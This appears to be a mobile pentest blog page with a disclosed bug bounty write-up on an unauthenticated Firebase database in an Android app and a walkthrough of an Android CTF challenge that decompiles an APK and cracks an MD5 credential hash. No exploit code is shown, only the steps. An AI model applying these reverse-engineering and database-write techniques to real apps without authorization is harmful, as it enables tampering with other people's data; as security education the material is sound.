Menu

Mobile Pentest

How I was able to find firebase database takeover vulnerability in a company

Introduction

This is my bug bounty write up about firebase database takeover vulnerability which I found in android app. There are just a few resources about android hacking. This article aims to briefly documents about one of the android vulnerability called firebase database takeover vulnerability. For this purpose I will share my finding about this vulnerability. I will blur some of the company information. Being said that , let’s get jump in.

Steps To Reproduce

1. Download application from google playstore.

2. Use apk extractor to extract apk.

3. I used bluestack emulator.

4. Use apktool to decompile the application.

5. Go to res/values/strings/xml

6.Look for firebase url

7.I wrote a python script to insert data

8.POC(Proof Of Concept)

Impact

This application doesn’t need any access _token to insert data to the firebase database. It is completely open and anybody can access it without any credentials.

Timeline

Vulnerability Reported – 15 October, 2020 3:37 AM.

Replied – 15 October, 2020 12:31 PM

Rewarded $100 for two reports – 21 October, 2020 11:21 AM.

Conclusion

I really appreciate the company for very fast reply when I was submitting the vulnerability and they replied me to disclose this vulnerability. I really enjoy finding bugs in their organization and thanks for agreeing to disclose this report and rewarding me a bounty.

References

https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1

Infosec Mobile CTF Challenge 1

Introduction

Hello , I am Chan. Today I want to write an article about android ctf challenge from Infosec Mobile CTF 2018. I know that there is a few resources about android pentesting while I was learning android pentest and so I want to make more articles about android pentest and want to share my knowledge to community.

Being said that , this article aims to briefly document some techniques and tools involved in the vulnerability assessment of android applications. For this purpose , we will solve the 1st challenge of Infosec mobile CTF and learn the mobile pentest through CTF Challenges. Please get the apk from here.

Initial Setup

I am going to use blue stack emulator to solve this challenge. So I already seted up the emulator and just going to click on the app and it will install automatically.

Challenge Description

App CTF Challenge 1: The goal behind this challenge is to figure out the username and password that would let the challenger login successfully. The flag should be “password:username”. (ends 4/6)

1. Decompile The Apk

I will use apktool to decompile the apk.

apktool d App1.apk

2. Launch the apk in emulator

3. Decompile the apk file to jar file to analyze the source code

I used dex2jar to decompile the apk to jar file

4. Get the following files

5. Use jd-gui to view the source codes of jar file

We can see that com.ctf.app1 is the package of the apk file and there is no interesting things on the Buildconfig.class

It is pretty obivious that this is md5 decrypt function.

As we saw the md5 function in above picture and now we can see that there is a md5 string. There is a function called OnClick.

What this function does is , it takes the username and password from user, combine them into one string and hash it using md5 and comparing the hash to 263c7fa932b26a56ec0ad76b94aff98b.

6. Getting the decrypted text for MD5 Hash

I used this website https://hashes.com/en/decrypt/hash to decrypt md5 hash.

7. Flag

As they mentioned in Challenge Description the flag is the username and password.

Username - admin
Password - [email protected]

8. POC(Proof Of Concept)

After submitting the username and password, we got the smile face:)

Conclusion

This is my first article about android pentest. If you would like to learn more about android pentest challenge, please keep reading in my blog. I will upload more about the android pentest challenges and solution. Also this is gonna be a series of learning android pentest through CTF challenges.

If you like this article, please share on your social media and share to your friends.

Keep learning.

Thank you!

Scroll to top